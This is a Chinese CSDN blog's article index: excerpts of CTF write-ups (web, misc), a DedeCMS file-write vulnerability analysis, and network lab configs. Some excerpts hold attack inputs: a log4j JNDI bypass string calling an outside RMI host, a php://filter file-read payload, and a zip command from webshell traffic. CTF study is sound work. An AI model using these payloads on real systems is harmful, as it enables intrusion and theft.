自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

末初的CSDN博客

博客仅为对自己的学习过程做记录,并无技术含量,欢迎师傅们指点和纠正。

  • 博客(547)
  • 收藏
  • 关注

原创 BUUCTF NewStarCTF 公开赛赛道Week2 Writeup

BUUCTF NewStarCTF 公开赛赛道Week2 Writeup

2022-10-03 15:12:36 2318

原创 2022年中国工业互联网安全大赛北京市选拔赛暨全国线上预选赛MISC-工控文件Writeup

本来报名了这个比赛的,但是后面给搞忘了,然后比赛完了之后才知道,Web没环境了,简单的来复现下唯一的一道Misc吧。官网没法下的这里(我从官方下的,因为写这篇文章时候忽然发现没法打开下载页面了,贴个我之前从官网下的)一开始以为这只是个标识罢了,没认为这是密码,后面实在没找到别的密码了,就试了下还真是。对于不同的密码可以打开不同的加密卷,提示另一个密码可能是。安装打开会有提醒,但是进去切换平台就可以打开。,猜测可能加密磁盘的密码在别的地方,这是。打开之后经过一番寻找,发现外设的摄像头。的加密磁盘了,但是用。

2022-10-03 14:43:58 3091 2

原创 BUUCTF NewStarCTF 公开赛赛道Week1 Writeup

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup

2022-10-03 10:42:07 1659

原创 BUUCTF:[SUCTF 2019]Pythonginx

的很多字符经过这样的一番编码处理都可以得到正常的字母,脚本fuzz。然后是找flag位置,比较无语的是的flag位置在。的配置文件网上位置有很多,这里能读取到的是。参数的处理过程如下图所示。

2022-10-02 11:13:56 952

原创 BUUCTF:[CISCN2019 华东南赛区]Web11

注意到了banner中信息说是。

2022-09-30 17:39:04 335

原创 [极客大挑战 2019]FinalSQL

字段中(内容比较长,等待时间需要久一点,因为BUU发包太快会直接ban掉,就加个。测起来有点感觉过滤很奇怪。

2022-09-26 12:19:13 438 2

原创 BUUCTF: [SWPU2019]Web1

登录注册、在测试的时候发现发布中的广告名如果输入一些敏感关键字,例如。但是因为没有字段信息可以查,使用无列名注入直接查内容。然后再之后的对广告名的fuzz测试中发现以下过滤。猜测广告名存在注入,尝试在广告名处输入单引号。,发布的时候并没有任何反应,发布后有个。尝试联合查询、首先需要判断有多少字段,直接报错了,基本确定广告名存在。无法注释就尝试构造闭合。可以查看发布的广告。查表明,因为这里过滤。

2022-09-25 16:12:24 696 2

原创 Heavy Blue Writeup

通道的数据提取出来转换成字符,然后拼接起来,以一行一行的方式读取。通过识别它们的文件头进行进一步解压,Python简单处理。一位师傅发的、来源不知、但是觉得这题可以记录一下。的压缩文件,接下来就是套娃解压,只不过这里混合了。通道有数据,而且看起来都在。的ASCII可显示字符范围。三种压缩格式的套娃压缩。读取RGB数据,只有。

2022-09-24 01:50:54 681 1

原创 BUUCTF: [网鼎杯 2020 朱雀组]Nmap

是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入,尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,

2022-09-21 23:05:44 1982

原创 BUUCTF:[WesternCTF2018]shrine

过滤了小括号基本上就没法使用各种类的方法了,而这里。在环境变量中,这里的过滤只针对。方法,可以直接查看到当前。

2022-09-21 08:40:37 268

原创 DASCTF X CBCTF 2022九月挑战赛 Writeup

DASCTF X CBCTF 2022九月挑战赛 Writeup

2022-09-20 12:14:28 1450 1

原创 BUUCTF: [MRCTF2020]Ezpop

的触发条件是把实例对象当作方法调用。很明显,如果把实例对象赋给。的触发条件是调用不可访问的属性或者方法,能做到的只有。是有办法通过php伪协议读取到。在当前目录,而整个题目只有。限定了形参为字符型,如果。

2022-09-19 14:58:47 410

原创 关于校园论坛帖子的相关脚本

调用接口识别验证码登录获得会话,检测是否为置顶文章,如果为置顶、终止程序,如果不为置顶,反序列化上一次存储的文章ID对象,然后删除上一次的文章,重发文章,并且将这一次文章的ID对象序列化存储起来以备下一次删除文章使用。

2022-09-16 14:21:00 367

原创 [NSSCTF 2022 Spring Recruit]babysql

最笨的办法,比较慢,需要多等一会,追求效率可以使用二分法。把注释符号都过滤了,可以使用闭合的方法构造注入,空格使用。根据输入框的提示传入。

2022-08-24 22:46:30 1192

原创 BUUCTF:[WUSTCTF2020]朴实无华

首先在下发现访问有一个假的flag,但是在响应头中找到一个提示,另外还有一个值得注意的是这里是访问得到PHP5中的函数中科学计数法符号无效,只会当作正常字符处理所以这里利用科学计数法的符号就可以绕过level 1level 2直接可参考我的这篇文章:浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题最后直接绕过和即可...

2022-06-24 19:08:22 1068

原创 Dest0g3 520迎新赛 Writeup

文章目录WEBphpdestMISCWelcome to fxxking DestCTFPngeniusEasyEncodeStrangeTrafficcodegameWEBphpdestphp源码分析 require_once 绕过不能重复包含文件的限制:https://www.anquanke.com/post/id/213235payload?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/se

2022-05-29 23:02:46 1513

原创 2022DASCTF MAY 出题人挑战赛 Writeup

2022DASCTF MAY 出题人挑战赛 Writeup

2022-05-23 19:11:13 971 2

原创 DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)

文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现漏洞原因uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell漏洞影响版本<= Dedecms V5.7 SP1的所有版本漏洞原理分析uploads/install/index.php对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理继续分析uploads/install/i

2022-05-18 18:34:08 2389

原创 PHP反序列化构造POP链小练习

一个师傅给的源码,来源不知,就当作小练习记录一下<?phperror_reporting(0);class Vox{ protected $headset; public $sound; public function fun($pulse){ include($pulse); } public function __invoke(){ $this->fun($this->headset); }}.

2022-05-13 11:12:32 887

原创 华为eNSP动态路由OSPF小实验三

R1syssys R1int lo 0ip add 1.1.1.1 32int g0/0/0ip add 12.1.1.1 24quitospf 1 router 1.1.1.1area 1network 12.1.1.0 0.0.0.255network 1.1.1.1 0.0.0.0R2syssys R2int g0/0/0ip add 12.1.1.2 24int s4/0/0ip add 23.1.1.2 24quitospf 1 router 2.2.2.

2022-05-05 14:14:21 759

原创 华为eNSP动态路由OSPF小实验二

R1syssys R1int lo 0 ip add 1.1.1.1 32int g0/0/0ip add 12.1.1.1 24quitospf 1 router 1.1.1.1area 1network 1.1.1.1 0.0.0.0network 12.1.1.0 0.0.0.255R2syssys R2int g0/0/0ip add 12.1.1.2 24int g0/0/1ip add 23.1.1.2 24quitospf 1 router 2.2..

2022-05-04 15:31:24 641

原创 华为eNSP动态路由OSPF小实验一

首先在每个路由器的设置上添加一个Serial的接口添加完之后即可开始配置R1:systemsys R1int g0/0/0ip add 12.1.1.1 24int s4/0/0ip add 13.1.1.1 24int lo 0ip add 1.1.1.1 32quitospf 1 router 1.1.1.1area 0network 12.1.1.0 0.0.0.255network 13.1.1.0 0.0.0.255network 1.1.1.1 0.0.0.0.

2022-04-28 10:23:30 1460

原创 第二届网刃杯网络安全大赛 Writeup

MISC玩坏的winxpvmdk文件,用DiskGenius打开,找到Administrator用户的桌面的学习资料binwalk分析meiren.png,foremost分离继续binwalk分析,foremost分离f1ag.png分离出来的压缩包需要密码提示QQ有压缩包密码,但是在虚拟磁盘镜像中没有找到有安装过QQ这个软件,猜测可能在线登录过,所以就找唯一安装的浏览器Firefox的本地数据这里几个.db文件都不是.db文件,Navicat无法建立连接,几个.sqlite文

2022-04-25 17:37:34 4688 7

原创 2022DASCTF Apr X FATE 防疫挑战赛 Writeup

文章目录SimpleFlow熟悉的猫冰墩墩废物选手的misc做题记录SimpleFlow首先tcp.stream eq 50中分析传入的执行命令的变量是$s,也就是参数substr($_POST["g479cf6f058cf8"],2)找到对应的参数,然后去掉前面两位字符解码即可cd "/Users/chang/Sites/test";zip -P PaSsZiPWorD flag.zip ../flag.txt;echo [S];pwd;echo [E]得到压缩包密码:PaSsZi

2022-04-25 16:04:01 2535 2

原创 华为eNSP配置RIP综合实验

AR1配置:syssys AR1inter g0/0/0 ip add 172.16.4.2 24inter g0/0/1 ip add 172.16.1.1 24quitripversion 2network 172.16.0.0AR2配置:syssys AR2inter g0/0/0 ip add 172.16.4.3 24inter g0/0/1ip add 172.16.2.1 24quitripversion 2network 172.16.0.0.

2022-04-14 15:31:20 2039

原创 AntCTF x D^3CTF MISC部分Writeup

文章目录BadW3terWannaWaccaBadW3ter附件是wav,但是文件头有点问题,对比一下正常的wav即可发现前十六个字节被修改了第一行的内容猜测也是个有用的线索: CUY1nw31lai修改前十六个进制正常的wav文件头然后测试几个常见的wav文件隐写:SilentEye、Deepsound等稍微测试一下发现是DeepSound输入前面的到线索作为密码。得到flag.pngfile识别文件发现flag.png是TIFF文件PS可以选择打开TIFF文件首先有两

2022-03-08 09:21:48 1435 5

原创 BUUCTF:[安洵杯 2019]easy_serialize_php

https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php访问/index.php?f=highlight_file得到源码 <?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'

2022-03-03 19:51:10 942

原创 关于校园通使用过程中的相关脚本

关于校园通使用过程中的相关脚本

2022-02-24 19:21:02 2062

原创 安装oh-my-zsh报错fatal: gnutls_handshake() failed: Error in the pull function的解决办法

安装oh-my-zsh时报错fatal: unable to access 'https://github.com/ohmyzsh/ohmyzsh.git/': gnutls_handshake() failed: Error in the pull function.Error: git clone of oh-my-zsh repo failed

2022-02-21 22:04:40 1395

原创 HGAME 2022 Writeup

文章目录Level - Week1WEBMISC欢迎欢迎!热烈欢迎!这个压缩包有点麻烦好康的流量群青(其实是幽灵东京)CRYPTO新人赛,就没有存题目附件了,简单的记录一下解题过程吧Level - Week1WEBMISC欢迎欢迎!热烈欢迎!hgame{We1com3_t0_HG@ME_2O22}这个压缩包有点麻烦README.txtI don't know if it's a good idea to write down all the passwords.将pa

2022-01-28 20:58:35 8388 11

原创 【MISC】记一次自己以前出的一道题

今天突然翻到的很久以前给一位师傅学校出的校赛题目,想着直接删了太可惜了,就丢在博客这里把Havefun.zip压缩包有密码,弱口令123456直接解压出来happymisc.zip的密码根据提示是:fairytailPS:本人妖尾忠实粉丝^_^解压得到comment.txt很明显是base32,解码发现是zip文件的十六进制字节流的逆序直接用python处理一下转换成zip文件import structa = open("./coment.txt","r")#十六进制数据文件.

2022-01-28 19:32:53 1243 3

原创 2022 RealWorld CTF体验赛Writeup

文章目录Digital Souvenirlog4flagBe-a-Database-Hackerthe Secrets of Memorybaby flaglabFlag ConsoleBe-a-Database-Hacker 2Java Remote DebuggerDigital Souvenirrwctf{RealWorldIsAwesome}log4flag有一些正则过滤网上bypass方法很多,随便找一个就行${${::-j}ndi:${lower:rmi}://vw3nw

2022-01-23 16:54:54 2033

原创 黑马程序员Java教程学习笔记(一)

文章目录黑马程序员Java学习笔记Java版本Java语言的跨平台原理JRE和JDKJDK的下载和安装HelloWorld案例注释关键字常量数据类型标识符类型转换运算符字符"+"操作字符串"+"操作复制运算符自增自减运算符关系运算符逻辑运算符三元运算符两只老虎三个和尚黑马程序员Java学习笔记Java版本Java(5.0):是更新力度很大的一个版本,直接让Java的发展进入了快车道Java(8.0):是公司中生产/开发环境使用的最多的版本Java(11.0):是Java学习者使用的最

2022-01-17 17:10:23 18912 2

原创 长安“战疫”网络安全卫士守护赛Writeup

长安战疫Writeup

2022-01-08 23:33:14 4076 1

原创 第二届BMZCTF公开赛-easymisc

文章目录题目设计解题步骤(Writeup)题目设计考察知识点:数据处理、wav文件头、高低振幅转换、LSB隐写题目思路:逆序字节流数据->wav文件->高低振幅转换->LSB隐写->异或测试以下是设计题目时所用到的脚本文件转换二进制01数据from binascii import *with open('1.png', 'rb') as f:#需要转换的文件 with open('bin.txt', 'w') as f1: hex_data = hexl

2022-01-02 17:09:10 3746 7

原创 2021年第二届赣网杯网络安全大赛MISC-Writeup

文章目录decodemastergwb-misc-lovemathgwb-misc3-testcatdecodemasterdecodemaster.docx的内容是wingding编码:https://lingojam.com/WingDingSllv we GMT gje dsh vc sim gzwspio!EHRw tfk koa sq om reocxeua lzdpuil. W rkwa xsg tqiewtc pb wznjurz o vwspmnwzmvem jegbmnwz

2021-12-06 23:31:11 7168 5

原创 第四届“安洵杯”网络安全挑战赛MISC-Writeup

文章目录WEBMISC应该算是签到CyzCC_loves_LOLCthulhu MythoslovemathWEBMISC应该算是签到B站搜索直接搜索这个BV号PS:出题人品味不错,我也喜欢酷玩的这首《Yellow》直接页面Ctrl+F没找出来搜索引擎找一下有没有通过API查弹幕的方法:https://www.bilibili.com/read/cv7923601F12点击Network,找到这个视频的cid从当前时间2021-11-27开始往前找https://api.bil

2021-11-29 22:54:57 5641

原创 西湖论剑2021中国杭州网络安全技能大赛部分Writeup

文章目录MISC真签到YUSA的小秘密Yusa的秘密WEB灏妹的webMISC真签到DASCTF{welc0m3_t0_9C51s_2021}YUSA的小秘密使用Stegsolve打开调整通道可以发现藏有flag;但是被干扰倒是无法看清搜索引擎查阅资料发现题目这里指的是一种叫YCrCb颜色编码模型参考[ByteCTF2020]Hardcore Watermark 01:https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJY

2021-11-21 12:38:48 9644 3

原创 “东华杯”2021年大学生网络安全邀请赛 暨第七届上海市大学生网络安全大赛线上赛MISC-Writeup

文章目录checkinprojectJumpJumpTigerwhere_can_find_codecheckin+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0-UTF-7编码UTF-7在线解码站:http://toolswebtop.com/text/process/decode/utf-7flag{dhb_7th}projecttest.exe附加了很多别的数据,运行之后发现生成了一个problem_bak.zip解压problem_bak.zi

2021-11-01 20:49:06 11326 8

原创 第四届“强网”拟态防御国际精英挑战赛MISC-mirror

full.png使用010 Editor打开出现CRC校验报错,猜测需要修复宽高,其次发现了文件末尾附加了镜像翻转的png字节流数据将附加数据提取出来另存为png文件,通过分析不难发现将字节流数据逆序然后每十六个字节流翻转一下即为正常的png数据使用Python简单处理from binascii import *with open('full1.png', 'rb') as f: with open('res-full.png', 'wb') as f1: hex_data = hexl.

2021-11-01 01:14:01 1055

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除